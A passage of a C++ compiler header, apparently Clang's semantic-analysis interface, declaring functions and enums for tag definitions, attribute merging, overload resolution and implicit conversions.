Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS,
const ParsedAttr &MSPropertyAttr);
FieldDecl *CheckFieldDecl(DeclarationName Name, QualType T,
TypeSourceInfo *TInfo,
RecordDecl *Record, SourceLocation Loc,
bool Mutable, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
SourceLocation TSSL,
AccessSpecifier AS, NamedDecl *PrevDecl,
Declarator *D = nullptr);
bool CheckNontrivialField(FieldDecl *FD);
void DiagnoseNontrivial(const CXXRecordDecl *Record, CXXSpecialMember CSM);
enum TrivialABIHandling {
/// The triviality of a method unaffected by "trivial_abi".
TAH_IgnoreTrivialABI,
/// The triviality of a method affected by "trivial_abi".
TAH_ConsiderTrivialABI
};
bool SpecialMemberIsTrivial(CXXMethodDecl *MD, CXXSpecialMember CSM,
TrivialABIHandling TAH = TAH_IgnoreTrivialABI,
bool Diagnose = false);
/// For a defaulted function, the kind of defaulted function that it is.
class DefaultedFunctionKind {
CXXSpecialMember SpecialMember : 8;
DefaultedComparisonKind Comparison : 8;
public:
DefaultedFunctionKind()
: SpecialMember(CXXInvalid), Comparison(DefaultedComparisonKind::None) {
}
DefaultedFunctionKind(CXXSpecialMember CSM)
: SpecialMember(CSM), Comparison(DefaultedComparisonKind::None) {}
DefaultedFunctionKind(DefaultedComparisonKind Comp)
: SpecialMember(CXXInvalid), Comparison(Comp) {}
bool isSpecialMember() const { return SpecialMember != CXXInvalid; }
bool isComparison() const {
return Comparison != DefaultedComparisonKind::None;
}
explicit operator bool() const {
return isSpecialMember() || isComparison();
}
CXXSpecialMember asSpecialMember() const { return SpecialMember; }
DefaultedComparisonKind asComparison() const { return Comparison; }
/// Get the index of this function kind for use in diagnostics.
unsigned getDiagnosticIndex() const {
static_assert(CXXInvalid > CXXDestructor,
"invalid should have highest index");
static_assert((unsigned)DefaultedComparisonKind::None == 0,
"none should be equal to zero");
return SpecialMember + (unsigned)Comparison;
}
};
DefaultedFunctionKind getDefaultedFunctionKind(const FunctionDecl *FD);
CXXSpecialMember getSpecialMember(const CXXMethodDecl *MD) {
return getDefaultedFunctionKind(MD).asSpecialMember();
}
DefaultedComparisonKind getDefaultedComparisonKind(const FunctionDecl *FD) {
return getDefaultedFunctionKind(FD).asComparison();
}
void ActOnLastBitfield(SourceLocation DeclStart,
SmallVectorImpl<Decl *> &AllIvarDecls);
Decl *ActOnIvar(Scope *S, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
tok::ObjCKeywordKind visibility);
// This is used for both record definitions and ObjC interface declarations.
void ActOnFields(Scope *S, SourceLocation RecLoc, Decl *TagDecl,
ArrayRef<Decl *> Fields, SourceLocation LBrac,
SourceLocation RBrac, const ParsedAttributesView &AttrList);
/// ActOnTagStartDefinition - Invoked when we have entered the
/// scope of a tag's definition (e.g., for an enumeration, class,
/// struct, or union).
void ActOnTagStartDefinition(Scope *S, Decl *TagDecl);
/// Perform ODR-like check for C/ObjC when merging tag types from modules.
/// Differently from C++, actually parse the body and reject / error out
/// in case of a structural mismatch.
bool ActOnDuplicateDefinition(DeclSpec &DS, Decl *Prev,
SkipBodyInfo &SkipBody);
typedef void *SkippedDefinitionContext;
/// Invoked when we enter a tag definition that we're skipping.
SkippedDefinitionContext ActOnTagStartSkippedDefinition(Scope *S, Decl *TD);
Decl *ActOnObjCContainerStartDefinition(Decl *IDecl);
/// ActOnStartCXXMemberDeclarations - Invoked when we have parsed a
/// C++ record definition's base-specifiers clause and are starting its
/// member declarations.
void ActOnStartCXXMemberDeclarations(Scope *S, Decl *TagDecl,
SourceLocation FinalLoc,
bool IsFinalSpelledSealed,
SourceLocation LBraceLoc);
/// ActOnTagFinishDefinition - Invoked once we have finished parsing
/// the definition of a tag (enumeration, class, struct, or union).
void ActOnTagFinishDefinition(Scope *S, Decl *TagDecl,
SourceRange BraceRange);
void ActOnTagFinishSkippedDefinition(SkippedDefinitionContext Context);
void ActOnObjCContainerFinishDefinition();
/// Invoked when we must temporarily exit the objective-c container
/// scope for parsing/looking-up C constructs.
///
/// Must be followed by a call to \see ActOnObjCReenterContainerContext
void ActOnObjCTemporaryExitContainerContext(DeclContext *DC);
void ActOnObjCReenterContainerContext(DeclContext *DC);
/// ActOnTagDefinitionError - Invoked when there was an unrecoverable
/// error parsing the definition of a tag.
void ActOnTagDefinitionError(Scope *S, Decl *TagDecl);
EnumConstantDecl *CheckEnumConstant(EnumDecl *Enum,
EnumConstantDecl *LastEnumConst,
SourceLocation IdLoc,
IdentifierInfo *Id,
Expr *val);
bool CheckEnumUnderlyingType(TypeSourceInfo *TI);
bool CheckEnumRedeclaration(SourceLocation EnumLoc, bool IsScoped,
QualType EnumUnderlyingTy, bool IsFixed,
const EnumDecl *Prev);
/// Determine whether the body of an anonymous enumeration should be skipped.
/// \param II The name of the first enumerator.
SkipBodyInfo shouldSkipAnonEnumBody(Scope *S, IdentifierInfo *II,
SourceLocation IILoc);
Decl *ActOnEnumConstant(Scope *S, Decl *EnumDecl, Decl *LastEnumConstant,
SourceLocation IdLoc, IdentifierInfo *Id,
const ParsedAttributesView &Attrs,
SourceLocation EqualLoc, Expr *Val);
void ActOnEnumBody(SourceLocation EnumLoc, SourceRange BraceRange,
Decl *EnumDecl, ArrayRef<Decl *> Elements, Scope *S,
const ParsedAttributesView &Attr);
DeclContext *getContainingDC(DeclContext *DC);
/// Set the current declaration context until it gets popped.
void PushDeclContext(Scope *S, DeclContext *DC);
void PopDeclContext();
/// EnterDeclaratorContext - Used when we must lookup names in the context
/// of a declarator's nested name specifier.
void EnterDeclaratorContext(Scope *S, DeclContext *DC);
void ExitDeclaratorContext(Scope *S);
/// Push the parameters of D, which must be a function, into scope.
void ActOnReenterFunctionContext(Scope* S, Decl* D);
void ActOnExitFunctionContext();
DeclContext *getFunctionLevelDeclContext();
/// getCurFunctionDecl - If inside of a function body, this returns a pointer
/// to the function decl for the function being parsed. If we're currently
/// in a 'block', this returns the containing context.
FunctionDecl *getCurFunctionDecl();
/// getCurMethodDecl - If inside of a method body, this returns a pointer to
/// the method decl for the method being parsed. If we're currently
/// in a 'block', this returns the containing context.
ObjCMethodDecl *getCurMethodDecl();
/// getCurFunctionOrMethodDecl - Return the Decl for the current ObjC method
/// or C function we're in, otherwise return null. If we're currently
/// in a 'block', this returns the containing context.
NamedDecl *getCurFunctionOrMethodDecl();
/// Add this decl to the scope shadowed decl chains.
void PushOnScopeChains(NamedDecl *D, Scope *S, bool AddToContext = true);
/// isDeclInScope - If 'Ctx' is a function/method, isDeclInScope returns true
/// if 'D' is in Scope 'S', otherwise 'S' is ignored and isDeclInScope returns
/// true if 'D' belongs to the given declaration context.
///
/// \param AllowInlineNamespace If \c true, allow the declaration to be in the
/// enclosing namespace set of the context, rather than contained
/// directly within it.
bool isDeclInScope(NamedDecl *D, DeclContext *Ctx, Scope *S = nullptr,
bool AllowInlineNamespace = false);
/// Finds the scope corresponding to the given decl context, if it
/// happens to be an enclosing scope. Otherwise return NULL.
static Scope *getScopeForDeclContext(Scope *S, DeclContext *DC);
/// Subroutines of ActOnDeclarator().
TypedefDecl *ParseTypedefDecl(Scope *S, Declarator &D, QualType T,
TypeSourceInfo *TInfo);
bool isIncompatibleTypedef(TypeDecl *Old, TypedefNameDecl *New);
/// Describes the kind of merge to perform for availability
/// attributes (including "deprecated", "unavailable", and "availability").
enum AvailabilityMergeKind {
/// Don't merge availability attributes at all.
AMK_None,
/// Merge availability attributes for a redeclaration, which requires
/// an exact match.
AMK_Redeclaration,
/// Merge availability attributes for an override, which requires
/// an exact match or a weakening of constraints.
AMK_Override,
/// Merge availability attributes for an implementation of
/// a protocol requirement.
AMK_ProtocolImplementation,
};
/// Describes the kind of priority given to an availability attribute.
///
/// The sum of priorities deteremines the final priority of the attribute.
/// The final priority determines how the attribute will be merged.
/// An attribute with a lower priority will always remove higher priority
/// attributes for the specified platform when it is being applied. An
/// attribute with a higher priority will not be applied if the declaration
/// already has an availability attribute with a lower priority for the
/// specified platform. The final prirority values are not expected to match
/// the values in this enumeration, but instead should be treated as a plain
/// integer value. This enumeration just names the priority weights that are
/// used to calculate that final vaue.
enum AvailabilityPriority : int {
/// The availability attribute was specified explicitly next to the
/// declaration.
AP_Explicit = 0,
/// The availability attribute was applied using '#pragma clang attribute'.
AP_PragmaClangAttribute = 1,
/// The availability attribute for a specific platform was inferred from
/// an availability attribute for another platform.
AP_InferredFromOtherPlatform = 2
};
/// Attribute merging methods. Return true if a new attribute was added.
AvailabilityAttr *
mergeAvailabilityAttr(NamedDecl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Platform, bool Implicit,
VersionTuple Introduced, VersionTuple Deprecated,
VersionTuple Obsoleted, bool IsUnavailable,
StringRef Message, bool IsStrict, StringRef Replacement,
AvailabilityMergeKind AMK, int Priority);
TypeVisibilityAttr *
mergeTypeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
TypeVisibilityAttr::VisibilityType Vis);
VisibilityAttr *mergeVisibilityAttr(Decl *D, const AttributeCommonInfo &CI,
VisibilityAttr::VisibilityType Vis);
UuidAttr *mergeUuidAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Uuid);
DLLImportAttr *mergeDLLImportAttr(Decl *D, const AttributeCommonInfo &CI);
DLLExportAttr *mergeDLLExportAttr(Decl *D, const AttributeCommonInfo &CI);
MSInheritanceAttr *mergeMSInheritanceAttr(Decl *D,
const AttributeCommonInfo &CI,
bool BestCase,
MSInheritanceModel Model);
FormatAttr *mergeFormatAttr(Decl *D, const AttributeCommonInfo &CI,
IdentifierInfo *Format, int FormatIdx,
int FirstArg);
SectionAttr *mergeSectionAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
CodeSegAttr *mergeCodeSegAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name);
AlwaysInlineAttr *mergeAlwaysInlineAttr(Decl *D,
const AttributeCommonInfo &CI,
const IdentifierInfo *Ident);
MinSizeAttr *mergeMinSizeAttr(Decl *D, const AttributeCommonInfo &CI);
NoSpeculativeLoadHardeningAttr *
mergeNoSpeculativeLoadHardeningAttr(Decl *D,
const NoSpeculativeLoadHardeningAttr &AL);
SpeculativeLoadHardeningAttr *
mergeSpeculativeLoadHardeningAttr(Decl *D,
const SpeculativeLoadHardeningAttr &AL);
OptimizeNoneAttr *mergeOptimizeNoneAttr(Decl *D,
const AttributeCommonInfo &CI);
SwiftNameAttr *mergeSwiftNameAttr(Decl *D, const AttributeCommonInfo &CI,
StringRef Name, bool Override);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D, const ParsedAttr &AL);
InternalLinkageAttr *mergeInternalLinkageAttr(Decl *D,
const InternalLinkageAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const ParsedAttr &AL);
CommonAttr *mergeCommonAttr(Decl *D, const CommonAttr &AL);
void mergeDeclAttributes(NamedDecl *New, Decl *Old,
AvailabilityMergeKind AMK = AMK_Redeclaration);
void MergeTypedefNameDecl(Scope *S, TypedefNameDecl *New,
LookupResult &OldDecls);
bool MergeFunctionDecl(FunctionDecl *New, NamedDecl *&Old, Scope *S,
bool MergeTypeWithOld);
bool MergeCompatibleFunctionDecls(FunctionDecl *New, FunctionDecl *Old,
Scope *S, bool MergeTypeWithOld);
void mergeObjCMethodDecls(ObjCMethodDecl *New, ObjCMethodDecl *Old);
void MergeVarDecl(VarDecl *New, LookupResult &Previous);
void MergeVarDeclTypes(VarDecl *New, VarDecl *Old, bool MergeTypeWithOld);
void MergeVarDeclExceptionSpecs(VarDecl *New, VarDecl *Old);
bool checkVarDeclRedefinition(VarDecl *OldDefn, VarDecl *NewDefn);
void notePreviousDefinition(const NamedDecl *Old, SourceLocation New);
bool MergeCXXFunctionDecl(FunctionDecl *New, FunctionDecl *Old, Scope *S);
// AssignmentAction - This is used by all the assignment diagnostic functions
// to represent what is actually causing the operation
enum AssignmentAction {
AA_Assigning,
AA_Passing,
AA_Returning,
AA_Converting,
AA_Initializing,
AA_Sending,
AA_Casting,
AA_Passing_CFAudited
};
/// C++ Overloading.
enum OverloadKind {
/// This is a legitimate overload: the existing declarations are
/// functions or function templates with different signatures.
Ovl_Overload,
/// This is not an overload because the signature exactly matches
/// an existing declaration.
Ovl_Match,
/// This is not an overload because the lookup results contain a
/// non-function.
Ovl_NonFunction
};
OverloadKind CheckOverload(Scope *S,
FunctionDecl *New,
const LookupResult &OldDecls,
NamedDecl *&OldDecl,
bool IsForUsingDecl);
bool IsOverload(FunctionDecl *New, FunctionDecl *Old, bool IsForUsingDecl,
bool ConsiderCudaAttrs = true,
bool ConsiderRequiresClauses = true);
enum class AllowedExplicit {
/// Allow no explicit functions to be used.
None,
/// Allow explicit conversion functions but not explicit constructors.
Conversions,
/// Allow both explicit conversion functions and explicit constructors.
All
};
ImplicitConversionSequence
TryImplicitConversion(Expr *From, QualType ToType,
bool SuppressUserConversions,
AllowedExplicit AllowExplicit,
bool InOverloadResolution,
bool CStyle,
bool AllowObjCWritebackConversion);
bool IsIntegralPromotion(Expr *From, QualType FromType, QualType ToType);
bool IsFloatingPointPromotion(QualType FromType, QualType ToType);
bool IsComplexPromotion(QualType FromType, QualType ToType);
bool IsPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType, bool &IncompatibleObjC);
bool isObjCWritebackConversion(QualType FromType, QualType ToType,
QualType &ConvertedType);
bool IsBlockPointerConversion(QualType FromType, QualType ToType,
QualType& ConvertedType);
bool FunctionParamTypesAreEqual(const FunctionProtoType *OldType,
const FunctionProtoType *NewType,
unsigned *ArgPos = nullptr);
void HandleFunctionTypeMismatch(PartialDiagnostic &PDiag,
QualType FromType, QualType ToType);
void maybeExtendBlockObject(ExprResult &E);
CastKind PrepareCastToObjCObjectPointer(ExprResult &E);
bool CheckPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath& BasePath,
bool IgnoreBaseAccess,
bool Diagnose = true);
bool IsMemberPointerConversion(Expr *From, QualType FromType, QualType ToType,
bool InOverloadResolution,
QualType &ConvertedType);
bool CheckMemberPointerConversion(Expr *From, QualType ToType,
CastKind &Kind,
CXXCastPath &BasePath,
bool IgnoreBaseAccess);
bool IsQualificationConversion(QualType FromType, QualType ToType,
bool CStyle, bool &ObjCLifetimeConversion);
bool IsFunctionConversion(QualType FromType, QualType ToType,
QualType &ResultTy);
bool DiagnoseMultipleUserDefinedConversion(Expr *From, QualType ToType);
bool isSameOrCompatibleFunctionType(CanQualType Param, CanQualType Arg);
ExprResult PerformMoveOrCopyInitialization(const InitializedEntity &Entity,
const VarDecl *NRVOCandidate,
QualType ResultType,
Expr *Value,
bool AllowNRVO = true);
bool CanPerformAggregateInitializationForOverloadResolution(
const InitializedEntity &Entity, InitListExpr *From);
bool CanPerformCopyInitialization(const InitializedEntity &Entity,
ExprResult Init);
ExprResult PerformCopyInitialization(const InitializedEntity &Entity,
SourceLocation EqualLoc,
ExprResult Init,
bool TopLevelOfInitList = false,
bool AllowExplicit = false);
ExprResult PerformObjectArgumentInitialization(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
CXXMethodDecl *Method);
/// Check that the lifetime of the initializer (and its subobjects) is
/// sufficient for initializing the entity, and perform lifetime extension
/// (when permitted) if not.
void checkInitializerLifetime(const InitializedEntity &Entity, Expr *Init);
ExprResult PerformContextuallyConvertToBool(Expr *From);
ExprResult PerformContextuallyConvertToObjCPointer(Expr *From);
/// Contexts in which a converted constant expression is required.
enum CCEKind {
CCEK_CaseValue, ///< Expression in a case label.
CCEK_Enumerator, ///< Enumerator value with fixed underlying type.
CCEK_TemplateArg, ///< Value of a non-type template parameter.
CCEK_NewExpr, ///< Constant expression in a noptr-new-declarator.
CCEK_ConstexprIf, ///< Condition in a constexpr if statement.
CCEK_ExplicitBool ///< Condition in an explicit(bool) specifier.
};
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
llvm::APSInt &Value, CCEKind CCE);
ExprResult CheckConvertedConstantExpression(Expr *From, QualType T,
APValue &Value, CCEKind CCE);
/// Abstract base class used to perform a contextual implicit
/// conversion from an expression to any type passing a filter.
class ContextualImplicitConverter {
public:
bool Suppress;
bool SuppressConversion;
ContextualImplicitConverter(bool Suppress = false,
bool SuppressConversion = false)
: Suppress(Suppress), SuppressConversion(SuppressConversion) {}
/// Determine whether the specified type is a valid destination type
/// for this conversion.
virtual bool match(QualType T) = 0;
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the expression has incomplete class type.
virtual SemaDiagnosticBuilder
diagnoseIncomplete(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a diagnostic when the only matching conversion function
/// is explicit.
virtual SemaDiagnosticBuilder diagnoseExplicitConv(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
/// Emits a note for the explicit conversion function.
virtual SemaDiagnosticBuilder
noteExplicitConv(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when there are multiple possible conversion
/// functions.
virtual SemaDiagnosticBuilder
diagnoseAmbiguous(Sema &S, SourceLocation Loc, QualType T) = 0;
/// Emits a note for one of the candidate conversions.
virtual SemaDiagnosticBuilder
noteAmbiguous(Sema &S, CXXConversionDecl *Conv, QualType ConvTy) = 0;
/// Emits a diagnostic when we picked a conversion function
/// (for cases when we are not allowed to pick a conversion function).
virtual SemaDiagnosticBuilder diagnoseConversion(
Sema &S, SourceLocation Loc, QualType T, QualType ConvTy) = 0;
virtual ~ContextualImplicitConverter() {}
};
class ICEConvertDiagnoser : public ContextualImplicitConverter {
bool AllowScopedEnumerations;
public:
ICEConvertDiagnoser(bool AllowScopedEnumerations,
bool Suppress, bool SuppressConversion)
: ContextualImplicitConverter(Suppress, SuppressConversion),
AllowScopedEnumerations(AllowScopedEnumerations) {}
/// Match an integral or (possibly scoped) enumeration type.
bool match(QualType T) override;
SemaDiagnosticBuilder
diagnoseNoMatch(Sema &S, SourceLocation Loc, QualType T) override {
return diagnoseNotInt(S, Loc, T);
}
/// Emits a diagnostic complaining that the expression does not have
/// integral or enumeration type.
virtual SemaDiagnosticBuilder
diagnoseNotInt(Sema &S, SourceLocation Loc, QualType T) = 0;
};
/// Perform a contextual implicit conversion.
ExprResult PerformContextualImplicitConversion(
SourceLocation Loc, Expr *FromE, ContextualImplicitConverter &Converter);
enum ObjCSubscriptKind {
OS_Array,
OS_Dictionary,
OS_Error
};
ObjCSubscriptKind CheckSubscriptingKind(Expr *FromE);
// Note that LK_String is intentionally after the other literals, as
// this is used for diagnostics logic.
enum ObjCLiteralKind {
LK_Array,
LK_Dictionary,
LK_Numeric,
LK_Boxed,
LK_String,
LK_Block,
LK_None
};
ObjCLiteralKind CheckLiteralKind(Expr *FromE);
ExprResult PerformObjectMemberConversion(Expr *From,
NestedNameSpecifier *Qualifier,
NamedDecl *FoundDecl,
NamedDecl *Member);
// Members have to be NamespaceDecl* or TranslationUnitDecl*.
// TODO: make this is a typesafe union.
typedef llvm::SmallSetVector<DeclContext *, 16> AssociatedNamespaceSet;
typedef llvm::SmallSetVector<CXXRecordDecl *, 16> AssociatedClassSet;
using ADLCallKind = CallExpr::ADLCallKind;
void AddOverloadCandidate(FunctionDecl *Function, DeclAccessPair FoundDecl,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool AllowExplicit = true,
bool AllowExplicitConversion = false,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddFunctionCandidates(const UnresolvedSetImpl &Functions,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool FirstArgumentIsBase = false);
void AddMethodCandidate(DeclAccessPair FoundDecl,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversion = false,
OverloadCandidateParamOrder PO = {});
void AddMethodCandidate(CXXMethodDecl *Method,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddMethodTemplateCandidate(FunctionTemplateDecl *MethodTmpl,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
OverloadCandidateParamOrder PO = {});
void AddTemplateOverloadCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet, bool SuppressUserConversions = false,
bool PartialOverloading = false, bool AllowExplicit = true,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
OverloadCandidateParamOrder PO = {});
bool CheckNonDependentConversions(
FunctionTemplateDecl *FunctionTemplate, ArrayRef<QualType> ParamTypes,
ArrayRef<Expr *> Args, OverloadCandidateSet &CandidateSet,
ConversionSequenceList &Conversions, bool SuppressUserConversions,
CXXRecordDecl *ActingContext = nullptr, QualType ObjectType = QualType(),
Expr::Classification ObjectClassification = {},
OverloadCandidateParamOrder PO = {});
void AddConversionCandidate(
CXXConversionDecl *Conversion, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddTemplateConversionCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddSurrogateCandidate(CXXConversionDecl *Conversion,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
const FunctionProtoType *Proto,
Expr *Object, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddNonMemberOperatorCandidates(
const UnresolvedSetImpl &Functions, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
void AddMemberOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
OverloadCandidateParamOrder PO = {});
void AddBuiltinCandidate(QualType *ParamTys, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool IsAssignmentOperator = false,
unsigned NumContextualBoolArguments = 0);
void AddBuiltinOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddArgumentDependentLookupCandidates(DeclarationName Name,
SourceLocation Loc,
ArrayRef<Expr *> Args,
TemplateArgumentListInfo *ExplicitTemplateArgs,
OverloadCandidateSet& CandidateSet,
bool PartialOverloading = false);
// Emit as a 'note' the specific overload candidate
void NoteOverloadCandidate(
NamedDecl *Found, FunctionDecl *Fn,
OverloadCandidateRewriteKind RewriteKind = OverloadCandidateRewriteKind(),
QualType DestType = QualType(), bool TakingAddress = false);
// Emit as a series of 'note's all template and non-templates identified by
// the expression Expr
void NoteAllOverloadCandidates(Expr *E, QualType DestType = QualType(),
bool TakingAddress = false);
/// Check the enable_if expressions on the given function. Returns the first
/// failing attribute, or NULL if they were all successful.
EnableIfAttr *CheckEnableIf(FunctionDecl *Function, ArrayRef<Expr *> Args,
bool MissingImplicitThis = false);
/// Find the failed Boolean condition within a given Boolean
/// constant expression, and describe it with a string.
std::pair<Expr *, std::string> findFailedBooleanCondition(Expr *Cond);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// non-ArgDependent DiagnoseIfAttrs.
///
/// Argument-dependent diagnose_if attributes should be checked each time a
/// function is used as a direct callee of a function call.
///
/// Returns true if any errors were emitted.
bool diagnoseArgDependentDiagnoseIfAttrs(const FunctionDecl *Function,
const Expr *ThisArg,
ArrayRef<const Expr *> Args,
SourceLocation Loc);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// ArgDependent DiagnoseIfAttrs.
///
/// Argument-independent diagnose_if attributes should be checked on every use
/// of a function.
///
/// Returns true if any errors were emitted.
bool diagnoseArgIndependentDiagnoseIfAttrs(const NamedDecl *ND,
SourceLocation Loc);
/// Returns whether the given function's address can be taken or not,
/// optionally emitting a diagnostic if the address can't be taken.
///
/// Returns false if taking the address of the function is illegal.
bool checkAddressOfFunctionIsAvailable(const FunctionDecl *Function,
bool Complain = false,
SourceLocation Loc = SourceLocation());
// [PossiblyAFunctionType] --> [Return]
// NonFunctionType --> NonFunctionType
// R (A) --> R(A)
// R (*)(A) --> R (A)
// R (&)(A) --> R (A)
// R (S::*)(A) --> R (A)
QualType ExtractUnqualifiedFunctionType(QualType PossiblyAFunctionType);
FunctionDecl *
ResolveAddressOfOverloadedFunction(Expr *AddressOfExpr,
QualType TargetType,
bool Complain,
DeclAccessPair &Found,
bool *pHadMultipleCandidates = nullptr);
FunctionDecl *
resolveAddressOfSingleOverloadCandidate(Expr *E, DeclAccessPair &FoundResult);
bool resolveAndFixAddressOfSingleOverloadCandidate(
ExprResult &SrcExpr, bool DoFunctionPointerConversion = false);
FunctionDecl *
ResolveSingleFunctionTemplateSpecialization(OverloadExpr *ovl,
bool Complain = false,
DeclAccessPair *Found = nullptr);
bool ResolveAndFixSingleFunctionTemplateSpecialization(
ExprResult &SrcExpr,
bool DoFunctionPointerConverion = false,
bool Complain = false,
SourceRange OpRangeForComplaining = SourceRange(),
QualType DestTypeForComplaining = QualType(),
unsigned DiagIDForComplaining = 0);
Expr *FixOverloadedFunctionReference(Expr *E,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
ExprResult FixOverloadedFunctionReference(ExprResult,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
void AddOverloadedCallCandidates(UnresolvedLookupExpr *ULE,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool PartialOverloading = false);
// An enum used to represent the different possible results of building a
// range-based for loop.
enum ForRangeStatus {
FRS_Success,
FRS_NoViableFunction,
FRS_DiagnosticIssued
};
ForRangeStatus BuildForRangeBeginEndCall(SourceLocation Loc,
SourceLocation RangeLoc,
const DeclarationNameInfo &NameInfo,
LookupResult &MemberLookup,
OverloadCandidateSet *CandidateSet,
Expr *Range, ExprResult *CallExpr);
ExprResult BuildOverloadedCallExpr(Scope *S, Expr *Fn,
UnresolvedLookupExpr *ULE,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc,
Expr *ExecConfig,
bool AllowTypoCorrection=true,
bool CalleesAddressIsTaken=false);
bool buildOverloadedCallSet(Scope *S, Expr *Fn, UnresolvedLookupExpr *ULE,
MultiExprArg Args, SourceLocation RParenLoc,
OverloadCandidateSet *CandidateSet,
ExprResult *Result);
ExprResult CreateOverloadedUnaryOp(SourceLocation OpLoc,
UnaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *input, bool RequiresADL = true);
void LookupOverloadedBinOp(OverloadCandidateSet &CandidateSet,
OverloadedOperatorKind Op,
const UnresolvedSetImpl &Fns,
ArrayRef<Expr *> Args, bool RequiresADL = true);
ExprResult CreateOverloadedBinOp(SourceLocation OpLoc,
BinaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
bool RequiresADL = true,
bool AllowRewrittenCandidates = true,
FunctionDecl *DefaultedFn = nullptr);
ExprResult BuildSynthesizedThreeWayComparison(SourceLocation OpLoc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
FunctionDecl *DefaultedFn);
ExprResult CreateOverloadedArraySubscriptExpr(SourceLocation LLoc,
SourceLocation RLoc,
Expr *Base,Expr *Idx);
ExprResult
BuildCallToMemberFunction(Scope *S, Expr *MemExpr,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult
BuildCallToObjectOfClassType(Scope *S, Expr *Object, SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult BuildOverloadedArrowExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
bool *NoArrowOperatorFound = nullptr);
/// CheckCallReturnType - Checks that a call expression's return type is
/// complete. Returns true on failure. The location passed in is the location
/// that best represents the call.
bool CheckCallReturnType(QualType ReturnType, SourceLocation Loc,
CallExpr *CE, FunctionDecl *FD);
/// Helpers for dealing with blocks and functions.
bool CheckParmsForFunctionDef(ArrayRef<ParmVarDecl *> Parameters,
bool CheckParameterNames);
void CheckCXXDefaultArguments(FunctionDecl *FD);
void CheckExtraCXXDefaultArguments(Declarator &D);
Scope *getNonFieldDeclScope(Scope *S);
/// \name Name lookup
///
/// These routines provide name lookup that is used during semantic
/// analysis to resolve the various kinds of names (identifiers,
/// overloaded operator names, constructor names, etc.) into zero or
/// more declarations within a particular scope. The major entry
/// points are LookupName, which performs unqualified name lookup,
